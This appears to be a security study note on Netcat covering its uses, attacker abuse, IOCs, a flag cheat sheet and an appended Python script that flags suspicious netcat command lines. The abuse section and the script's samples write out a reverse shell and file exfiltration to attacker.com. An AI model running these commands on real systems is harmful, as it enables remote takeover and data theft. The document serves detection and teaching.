## What is Netcat?

- Multipurpose CLI networking tool.
- Can create clients and servers from the terminal.
- Can read/write data via TCP/UDP.

---

## Use Cases

- Port Scanning
- Service Discovery
- File Transfer
- Reverse Shell
- Network Debugging

---

## Netcat Abuse

### Reverse Shells

Attackers can use netcat to connect back from a compromised host to their own nc server, allowing for a remote shell.

```bash
# Attacker's Machine
nc -lvp 4444

# Victim's Machine
nc attacker.com 4444 -e /bin/bash
```

**Note:** This may bypass firewall rules. If the firewall only has inbound rules, they won't affect the connection, because the connection is initiated by the victim.

### Data Exfiltration

Attackers can exfiltrate stolen, sensitive data via netcat's file transfer capabilities.

```bash
# Sending Files
nc attacker.com 4444 < sensitive_files.zip

# Receiving Files
nc -lvp 4444 > sensitive_files.zip
```

---

## IOCs

### Process Activity

- Command line of `nc` or `ncat`

### Network Activity

- Outbound connections to ports:
  - 4444

### File Reputation

- Known `nc` binary hashes

---

## Commands

- `nc -h` - Show help and options
- `nc <host> <port>` - Connect to a host and port
- `nc -l -p <port>` - Listen on a specific port
- `nc -nlvp <port>` - Listen for all types of connections
- `nc -l -p <p> > file` - Receive a file
- `nc -w 3 <host> <port> < file` - Send a file
- `nc -l` - Listen without time limit
- `nc -v -n` - Verbose mode without DNS resolution
- `nc -u -l -p <port>` - Listen for UDP on a specific port
- `nc -u <host> <port>` - Connect UDP to a host and port
- `nc -e /bin/sh` - Execute a shell after connection
- `nc -z <host> <port>` - Check the status of ports
- `nc -s <source>` - Specify a source address
- `nc -c <command>` - Execute a command after connection
- `nc -r` - Enable random port selection
- `nc -k` - Accept multiple connections
- `nc -i <seconds>` - Set a time interval
- `nc -X <proxy>` - Set a proxy per connection
- `nc -n` - Disable DNS resolution
- `nc -o <file>` - Redirect output to a file
- `nc -p <port>` - Specify a port to connect
- `nc -v` - Verbose mode
- `nc -w <seconds>` - Verbose mode with wait time
- `nc -k` - Listen and accept multiple connections
- `nc -X <type>` - Set the type of proxy
- `nc -L host:port` - Connect through a tunnel
- `nc -u -p <port>` - Specify a UDP port
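
The process and network indicators listed under IOCs above, turned into a small triage check over process command lines (an added example, not part of the original notes). The finding labels, function names and sample command lines are constructed for illustration; `--exec` and `--sh-exec` are ncat's long forms of `-e` and `-c`.

```python
import shlex

# Binary names and the port come from the page's IOC list;
# the finding labels are this example's own.
NETCAT_NAMES = {"nc", "ncat", "nc.exe", "ncat.exe"}
WATCH_PORTS = {4444}
LONG_EXEC = {"--exec", "--sh-exec"}  # ncat long forms of -e / -c

def analyze(cmdline):
    """Return the set of findings for one command line (empty if not netcat)."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keeps Windows backslashes intact
    except ValueError:                            # unbalanced quotes: plain split
        argv = cmdline.split()
    if not argv:
        return set()
    exe = argv[0].strip("\"'").replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in NETCAT_NAMES:
        return set()
    findings = {"netcat-process"}
    short = set()
    for arg in argv[1:]:
        if arg in LONG_EXEC:
            findings.add("exec-on-connect")
        elif arg.startswith("-") and not arg.startswith("--"):
            short.update(arg[1:])                 # "-nlvp" -> n, l, v, p
        elif arg.isdecimal() and int(arg) in WATCH_PORTS:
            findings.add("watched-port")
    if short & {"e", "c"}:                        # -e / -c as listed in Commands
        findings.add("exec-on-connect")
    if "l" in short:
        findings.add("listener")
    return findings

def triage(cmdlines):
    """Keep only netcat events, those with the most findings first."""
    hits = [(c, analyze(c)) for c in cmdlines]
    return sorted((h for h in hits if h[1]), key=lambda h: -len(h[1]))

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE = [
    "nc attacker.com 4444 -e /bin/bash",
    "/usr/bin/ncat -nlvp 4444",
    "C:\\Tools\\nc.exe -w 3 10.0.0.5 8080",
    "rsync -e ssh src/ host:dst/",                # -e, but not netcat
]

if __name__ == "__main__":
    for cmd, found in triage(SAMPLE):
        print(sorted(found), cmd)
```

Shell redirections such as `< file` are handled by the shell and never appear in a process's argument list, so the file-transfer case needs network telemetry rather than command-line matching.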